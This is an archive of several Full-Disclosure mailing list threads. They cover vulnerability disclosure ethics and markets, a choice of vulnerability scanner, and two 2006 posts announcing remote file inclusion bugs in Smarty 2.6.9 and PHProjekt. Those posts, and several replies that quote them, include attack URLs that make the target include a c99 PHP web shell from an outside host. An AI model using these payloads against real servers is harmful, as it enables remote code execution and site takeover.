Re: [Full-disclosure] Vuln Disclosure summarized (TTBOMA)
On Thu, 29 Apr 2010 10:17:22 +0200, Thierry Zoller said: > >- Releasing at a conference => Probable court time. > Under what legislation would that potentially be the case ? Ask Michael Lynn about that sometime. And Sklylarov ended up in jail for a while for saying 'Rot-13'. pgpTuzi8BVO1c.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln Disclosure summarized (TTBOMA)
Hello, Your missing legislative circumstances in your thoughts : >- Releasing at a conference => Probable court time. Under what legislation would that potentially be the case ? >- Keeping it to yourself => Working under the assumption that your the >only one that has found that same bug is still semi relevant due to >the incredibly small size of the exploit dev community. However, as >Dave said, they'll be toasting to their sleeping dead 0days some day. Under the jurisdiction I personaly am under I am responsbile if I DON'T disclose vulnerabilities (to the vendor) - this includes potential damages should the vulnerability be used. This is the law over here if you have the PSF statute. -- http://blog.zoller.lu Thierry Zoller ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln Disclosure summarized (TTBOMA)
Rob, The reason why different options exist is because people have the freedom of choice, and depending on their way of thinking they do. Some people want to get paid for their findings through ZDI or iDefense, others prefer the credits only by publishing advisories following or not an RFP. I use to launch advisories in the past, now I'm with the 'No More Free Bugs'. Some people prefer to watch the vulnerabilities get fixed, while others prefer to create weaponized exploits to sell to governments cyber warfare and cybercrime divisions, or to someone else. As you won't succeed making politicians agree among them in their way of thinking, you'll also fail trying to do the same among us. Cheers, sergio On Apr 29, 2010, at 5:06 AM, Rob Fuller wrote: > I have an admittedly limited view of the exploit dev world. However, > from what I've seen devs have very few options: (Please correct me if > I'm wrong) > > "Responsible Disclosure" => > > - Direct Contact => depending on the size of the vendor and their view > on security, this could result in anything from a simple thanks, a > reward, to a court hearing. > > - Exploit Broker => possibly sell, possibly not, depends on the > broker. The vuln could die on the table or stolen due to too much > information being given during negotiations. This route has the same > financial risk as direct contact, but a lot less risk of getting sued. > > - ZDI (or other vuln clearing house) => "instant" cash, but admittedly > less than an Exploit Broker could possible get based on the financial > risk to ZDI. Close to zero risk of court time (they may come after you > for selling the exploit). And a lot less financial risk since (IIRC) > they pay up front. But then the vulns go to also undisclosed parties, > potentially the highest bidder which is probably not the vendor. > > - "other" secretive groups who share vulns for different reasons... > > - Just to friends => No cash, no judicial risk, but you do risk them > stealing/selling your exploit. > > "Full Disclosure" > > - Posting it to the web for all to see/user => Possible court time, > but the definite upside is the vendor is forced to react. A very quick > way to make enemies. > > - Releasing at a conference => Probable court time. > > "No Disclosure" > > - Keeping it to yourself => Working under the assumption that your the > only one that has found that same bug is still semi relevant due to > the incredibly small size of the exploit dev community. However, as > Dave said, they'll be toasting to their sleeping dead 0days some day. > > "No More Free Bugs" > > - My stance on this is split, while I think people should get paid for > their work, I relate this movement to mowing someone's lawn and then > ringing their doorbell and asking for money. However I'm sure Robert > Graham's punch in the face metaphor also works. > > // > > Like, I have stated above, I am far and away a newbie to the vuln > disclosure world and this debate has been going on since before I > owned my own computer, but with the brilliant minds working at it, why > doesn't anyone offer up a solid solution to it? > > My solution? Create a standard, something that we all abide by. I know > as hackers we rebel against such things but in the interest of getting > better security out there (yes, that's what we are here for right? > right?) we should should really work together on this. What sounds > right? > > I mean, what is the right way to approach someone who's lawn you've > mowed for the work you have done? Maybe free for open source projects, > and a price based on exploitability and market share of the affected > product? > > > For reference: > > Vuln Trading Markets and You by Michal Zalewski (lcamtuf): > => > http://lcamtuf.blogspot.com/2010/04/vulnerability-trading-markets-and-you.html > > Vuln Disclosure is Rude by Robert Graham: > => http://erratasec.blogspot.com/2010/04/vuln-disclosure-is-rude.html > > No More Free Bugs movement by Charlie Miller, Alex Sotirov and Dino > Dai Zovi: > => http://trailofbits.com/2009/03/22/no-more-free-bugs/ > > Dailydave Post by Dave Aitel: > => http://lists.immunitysec.com/pipermail/dailydave/2010-April/006100.html > > > -- > Rob Fuller | Mubix > Room362.com | Hak5.org > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vuln Disclosure summarized (TTBOMA)
I have an admittedly limited view of the exploit dev world. However, from what I've seen devs have very few options: (Please correct me if I'm wrong) "Responsible Disclosure" => - Direct Contact => depending on the size of the vendor and their view on security, this could result in anything from a simple thanks, a reward, to a court hearing. - Exploit Broker => possibly sell, possibly not, depends on the broker. The vuln could die on the table or stolen due to too much information being given during negotiations. This route has the same financial risk as direct contact, but a lot less risk of getting sued. - ZDI (or other vuln clearing house) => "instant" cash, but admittedly less than an Exploit Broker could possible get based on the financial risk to ZDI. Close to zero risk of court time (they may come after you for selling the exploit). And a lot less financial risk since (IIRC) they pay up front. But then the vulns go to also undisclosed parties, potentially the highest bidder which is probably not the vendor. - "other" secretive groups who share vulns for different reasons... - Just to friends => No cash, no judicial risk, but you do risk them stealing/selling your exploit. "Full Disclosure" - Posting it to the web for all to see/user => Possible court time, but the definite upside is the vendor is forced to react. A very quick way to make enemies. - Releasing at a conference => Probable court time. "No Disclosure" - Keeping it to yourself => Working under the assumption that your the only one that has found that same bug is still semi relevant due to the incredibly small size of the exploit dev community. However, as Dave said, they'll be toasting to their sleeping dead 0days some day. "No More Free Bugs" - My stance on this is split, while I think people should get paid for their work, I relate this movement to mowing someone's lawn and then ringing their doorbell and asking for money. However I'm sure Robert Graham's punch in the face metaphor also works. // Like, I have stated above, I am far and away a newbie to the vuln disclosure world and this debate has been going on since before I owned my own computer, but with the brilliant minds working at it, why doesn't anyone offer up a solid solution to it? My solution? Create a standard, something that we all abide by. I know as hackers we rebel against such things but in the interest of getting better security out there (yes, that's what we are here for right? right?) we should should really work together on this. What sounds right? I mean, what is the right way to approach someone who's lawn you've mowed for the work you have done? Maybe free for open source projects, and a price based on exploitability and market share of the affected product? For reference: Vuln Trading Markets and You by Michal Zalewski (lcamtuf): => http://lcamtuf.blogspot.com/2010/04/vulnerability-trading-markets-and-you.html Vuln Disclosure is Rude by Robert Graham: => http://erratasec.blogspot.com/2010/04/vuln-disclosure-is-rude.html No More Free Bugs movement by Charlie Miller, Alex Sotirov and Dino Dai Zovi: => http://trailofbits.com/2009/03/22/no-more-free-bugs/ Dailydave Post by Dave Aitel: => http://lists.immunitysec.com/pipermail/dailydave/2010-April/006100.html -- Rob Fuller | Mubix Room362.com | Hak5.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On Sun, 15 Oct 2006 14:19:08 -0500 Pink Hat <[EMAIL PROTECTED]> wrote: >I didn't know those were mutually exclusive. Thats like asking >your >mom is she is a slut or a whore. Aren't they one and the same? > >On 10/15/06, upb <[EMAIL PROTECTED]> wrote: >> >> are you fucking stupid or just retarded? >> >> >> On 10/14/06, hitham hitham <[EMAIL PROTECTED]> wrote: >> > >> > Hi I find a new vuln ... >> > >> > the vuln :- >> > >> > # >> > >> > # Auother :- Sp1deR_NeT >> > >> > # E-mail :- [EMAIL PROTECTED] >> > >> > # Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com >> > >> > # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi . >> > >> > # >> > >> > Script :- Smarty-2.6.9 >> > >> > Exploit :- libs/Smarty.class.php?filename= >www.soqor.net/tools/c99.txt? >> > >> > Example :- >> > >> >www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.ne >t/tools/c99.txt >> ? >> > >> > Vuln Code :- >> > /** >> > * wrapper for include() retaining $this >> > * @return mixed >> > */ >> >function _include($filename, $once=false, $params=null) >> >{ >> >if ($once) { >> >return include_once($filename); >> >} else { >> >return include($filename); >> >} >> >} >> > - >> > >> > Thx To :- >nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA. >> > >> > - >> > >> > WwW.Sp1deR-N3T.Com ///\\\///\\\ >> > >> > [EMAIL PROTECTED] >> > >> > [EMAIL PROTECTED]@[EMAIL PROTECTED]@[EMAIL PROTECTED] >> > >> > >> >_ >> > Windows Live™ Messenger has arrived. Click here to download it >for free! >> > http://imagine-msn.com/messenger/launch80/?locale=en-gb >> > >> > >> > >> > ___ >> > Full-Disclosure - We believe in it. >> > Charter: >> http://lists.grok.org.uk/full-disclosure-charter.html >> > Hosted and sponsored by Secunia - http://secunia.com/ >> > >> > >> >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: >> http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> > >___ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. -BEGIN PGP SIGNATURE- Note: This signature can be verified at https://www.hushtools.com/verify Version: Hush 2.5 wpwEAQECAAYFAkU4hOEACgkQ3AEcWsxdEQ7OMAP+OFcUTRO2LF0UVWl1YdKpTaMnrsTG 1ML9rZcc276Q9nzsVV3O4SPTd2KExuToLUp1YU16DxtmV5Nk7wbd4yqcOEa996bWWTq8 Kc/oK04GJgGoLX9BqGvXkuLXEjZFfTaZegbshjUUJjH/kGEYFdutIlHlkqtL2uNUjMW/ P69GcKk= =F3kH -END PGP SIGNATURE- Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
Thanks. But don´t worry I won´t read sh... anyway :) Nothing interesting could come from that hitman anyway.RegardsWACOn 10/16/06, Pink Hat <[EMAIL PROTECTED]> wrote: On 10/16/06, wac <[EMAIL PROTECTED]> wrote:> Hey you could start by writing those sites in english :P> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8Not perfect but readable... I guess... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
Nah. That's probably WAY too advanced for 'em. I get the feeling this is the AOL sort of person. Honestly, I'm surprised they figured out how to subscribe to this list in the first place... Ferdinand Klinzer wrote: > Google search : Intro to HTML > > cheers > > Am 16.10.2006 um 12:42 schrieb C. Hamby: > >>> Yipe! >>> >>> Ya know if you need an "intro to HTML" book I can probably scare >>> one up >>> for ya... :-) >>> >>> Pink Hat wrote: On 10/16/06, wac <[EMAIL PROTECTED]> wrote: > Hey you could start by writing those sites in english :P > http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal- HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8 Not perfect but readable... I guess... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ >>> ___ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Google search : Intro to HTML cheers Am 16.10.2006 um 12:42 schrieb C. Hamby: > Yipe! > > Ya know if you need an "intro to HTML" book I can probably scare > one up > for ya... :-) > > Pink Hat wrote: >> On 10/16/06, wac <[EMAIL PROTECTED]> wrote: >>> Hey you could start by writing those sites in english :P >>> >> >> http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal- >> HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8 >> >> Not perfect but readable... I guess... >> >> ___ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (Darwin) iD8DBQFFM3NgivpgT1glX4cRAiiDAKCJSYmVrMNRbd3fnqk2eVUo2FWylgCgoxoQ BrkTpdSb3gdBQsBdoS6+psU= =ctNs -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
Yipe! Ya know if you need an "intro to HTML" book I can probably scare one up for ya... :-) Pink Hat wrote: > On 10/16/06, wac <[EMAIL PROTECTED]> wrote: >> Hey you could start by writing those sites in english :P >> > > http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8 > > Not perfect but readable... I guess... > > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
On 10/16/06, wac <[EMAIL PROTECTED]> wrote: > Hey you could start by writing those sites in english :P > http://translate.google.com/translate?u=http%3A%2F%2FWwW.Pal-HackinG.Com+&langpair=ar%7Cen&hl=en&ie=UTF8 Not perfect but readable... I guess... ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
Hey you could start by writing those sites in english :POn 10/13/06, hitham hitham <[EMAIL PROTECTED] > wrote:===# Found By Sp1deR_NeT .. # E-mail :- [EMAIL PROTECTED]# Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com # We Are :- PalEstine HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL )*Script :- PHP rojekt5.1.1-Code Vuln :-$include_path = $path_pre.'lib/lib.inc.php'; include_once($include_path)In File :- editor_big.php-Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?Example :- www.sitename.com/[path]/lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt?- [EMAIL PROTECTED]Sp1deR_NeT ^__^===_ Be the first to hear what's new at MSN - sign up to our free newsletters!http://www.msn.co.uk/newsletters___Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.htmlHosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln
On 10/15/06, Pink Hat <[EMAIL PROTECTED]> wrote: > I didn't know those were mutually exclusive. Thats like asking your > mom is she is a slut or a whore. Aren't they one and the same? As I said to Pink Hat: "One's freeware, the other is payware." The more I think about it, the more it's like software licensing: - some encourage you to share - some permit you to create derivative works - some have viral licenses - some licenses have severable clauses - there's the whole issue of market penetration - showing off the patent may cause you to pay for the product There's more, but I'll leave them for someone else. CK -- GDB has a 'break' feature; why doesn't it have 'fix' too? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln
I didn't know those were mutually exclusive. Thats like asking your mom is she is a slut or a whore. Aren't they one and the same? On 10/15/06, upb <[EMAIL PROTECTED]> wrote: > > are you fucking stupid or just retarded? > > > On 10/14/06, hitham hitham <[EMAIL PROTECTED]> wrote: > > > > Hi I find a new vuln ... > > > > the vuln :- > > > > # > > > > # Auother :- Sp1deR_NeT > > > > # E-mail :- [EMAIL PROTECTED] > > > > # Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com > > > > # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi . > > > > # > > > > Script :- Smarty-2.6.9 > > > > Exploit :- libs/Smarty.class.php?filename= www.soqor.net/tools/c99.txt? > > > > Example :- > > > www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt > ? > > > > Vuln Code :- > > /** > > * wrapper for include() retaining $this > > * @return mixed > > */ > >function _include($filename, $once=false, $params=null) > >{ > >if ($once) { > >return include_once($filename); > >} else { > >return include($filename); > >} > >} > > - > > > > Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA. > > > > - > > > > WwW.Sp1deR-N3T.Com ///\\\///\\\ > > > > [EMAIL PROTECTED] > > > > [EMAIL PROTECTED]@[EMAIL PROTECTED]@[EMAIL PROTECTED] > > > > > _ > > Windows Live™ Messenger has arrived. Click here to download it for free! > > http://imagine-msn.com/messenger/launch80/?locale=en-gb > > > > > > > > ___ > > Full-Disclosure - We believe in it. > > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > > > > > ___ > Full-Disclosure - We believe in it. > Charter: > http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln
are you fucking stupid or just retarded? On 10/14/06, hitham hitham <[EMAIL PROTECTED]> wrote: Hi I find a new vuln ...the vuln :-# # Auother :- Sp1deR_NeT# E-mail :- [EMAIL PROTECTED]# Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com# We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi .#Script :- Smarty-2.6.9Exploit :- libs/Smarty.class.php?filename= www.soqor.net/tools/c99.txt?Example :-www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt ?Vuln Code :-/*** wrapper for include() retaining $this* @return mixed*/ function _include($filename, $ $params=null) { if ($once) { return include_once($filename); } else { return include($filename); } }-Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA.- WwW.Sp1deR-N3T.Com ///\\\///\\\[EMAIL PROTECTED][EMAIL PROTECTED]@[EMAIL PROTECTED]@[EMAIL PROTECTED]_ Windows Live™ Messenger has arrived. Click here to download it for free!http://imagine-msn.com/messenger/launch80/?locale=en-gb ___Full-Disclosure - We believe in it.Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vuln
Hi I find a new vuln ... the vuln :- # # Auother :- Sp1deR_NeT # E-mail :- [EMAIL PROTECTED] # Site's :- WWW.Pal-HackinG.Com ++ WwW.Sp1deR-N3t.Com # We Are :- Sp1deR_NeT , HACKERS PAL , MohajaLi . # Script :- Smarty-2.6.9 Exploit :- libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt? Example :- www.sitename.com/[path]/libs/Smarty.class.php?filename=www.soqor.net/tools/c99.txt? Vuln Code :- /** * wrapper for include() retaining $this * @return mixed */ function _include($filename, $once=false, $params=null) { if ($once) { return include_once($filename); } else { return include($filename); } } - Thx To :- nET^ViRus,Dr.HackeR,RunViruS,MaFiaBoy,Mr.Hcr,KabaRa,LeCoprA. - WwW.Sp1deR-N3T.Com ///\\\///\\\ [EMAIL PROTECTED] [EMAIL PROTECTED]@[EMAIL PROTECTED]@[EMAIL PROTECTED] _ Windows Live Messenger has arrived. Click here to download it for free! http://imagine-msn.com/messenger/launch80/?locale=en-gb ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln ....
Ououh! What a geek!, your website is a crapy shit, i laught a lot with yours : img src="../../Desktop/333_files/index_05.jpg" Take care! - Original Message - From: "hitham hitham" <[EMAIL PROTECTED]> To: Sent: Friday, October 13, 2006 4:40 PM Subject: [Full-disclosure] Vuln ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vuln ....
=== # Found By Sp1deR_NeT .. # E-mail :- [EMAIL PROTECTED] # Site's :- WwW.Sp1deR-N3T.Com +++ WwW.Pal-HackinG.Com # We Are :- PalEstine HackerS TeAm ..(Sp1deR_Net , MohajaLi , HACKERS PAL ) * Script :- PHP rojekt5.1.1 - Code Vuln :- $include_path = $path_pre.'lib/lib.inc.php'; include_once($include_path) In File :- editor_big.php - Exploit : lib/specialdays.php?$path_pre=www.soqor.net/tools/c99.txt? Example :- www.sitename.com/[path]/lib/specialdays.php? $path_pre=www.soqor.net/tools/c99.txt? - [EMAIL PROTECTED] Sp1deR_NeT ^__^ === _ Be the first to hear what's new at MSN - sign up to our free newsletters! http://www.msn.co.uk/newsletters ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
RE: [Full-disclosure] Vuln scanner software choices
Secure Enterprise mag did a review of 7 different "vulnerability-management suites" (as they called them) in Dec. 2004. Take it for what it's worth, but notice that ISS was not included. Perhaps the review offered by Mr. Schmehl is all you need. http://www.secureenterprisemag.com/products/showArticle.jhtml?articleID= 54200188 -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Paul Schmehl Sent: Thursday, November 10, 2005 4:58 PM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Vuln scanner software choices --On Thursday, November 10, 2005 12:32:27 -0700 Tblinux <[EMAIL PROTECTED]> wrote: > I know that most if not all of you use or have used Nessus at some point. > I've been following the thread. Now that it appears that Nessus is > seriously ratcheting down support for independent consultants and > corporate / gov't users without a registered and paid for license what > scanning software are you considering? Has anyone done a *complete* > comparison of all of the scanning software out there and made a choice > based on the findings? If so what was it? > There's bound to be a comparison somewhere. All I can tell you, from personal experience, is avoid ISS like the plague it is. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ This message contains confidential information intended only for the individual named. If you are not the addressee, do not disseminate, distribute or copy this e-mail. Please notify the sender immediately by e-mail if you have received this by mistake and delete it from your system. E-mail cannot guarantee secure, error-free transmission as information can be intercepted, corrupted, lost, destroyed, arrive late or incomplete, or contain viruses. The sender therefore does not accept liability for any errors or omissions in the contents of this message, which arise because of e-mail transmission. If verification is required, please request a hard-copy version. When working with third parties, e-mail cannot be used in lieu of signed paper documents to represent approvals of, authority for or acknowledgements of company transactions. Any views or opinions presented in this email are solely those of the author and do not necessarily represent those of Pioneer Credit Recovery, Inc. 26 Edward St. Arcade, NY 14009 http://www.pioneer-credit.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vuln scanner software choices
--On Thursday, November 10, 2005 12:32:27 -0700 Tblinux <[EMAIL PROTECTED]> wrote: I know that most if not all of you use or have used Nessus at some point. I've been following the thread. Now that it appears that Nessus is seriously ratcheting down support for independent consultants and corporate / gov't users without a registered and paid for license what scanning software are you considering? Has anyone done a *complete* comparison of all of the scanning software out there and made a choice based on the findings? If so what was it? There's bound to be a comparison somewhere. All I can tell you, from personal experience, is avoid ISS like the plague it is. Paul Schmehl ([EMAIL PROTECTED]) Adjunct Information Security Officer University of Texas at Dallas AVIEN Founding Member http://www.utdallas.edu/ir/security/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Vuln scanner software choices
I know that most if not all of you use or have used Nessus at some point. I've been following the thread. Now that it appears that Nessus is seriously ratcheting down support for independent consultants and corporate / gov't users without a registered and paid for license what scanning software are you considering? Has anyone done a *complete* comparison of all of the scanning software out there and made a choice based on the findings? If so what was it? I work for a fairly large company and the contract negotiations with Tenable are going poorly and the company I work for is looking at the options. Any input would be greatly appreciated ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/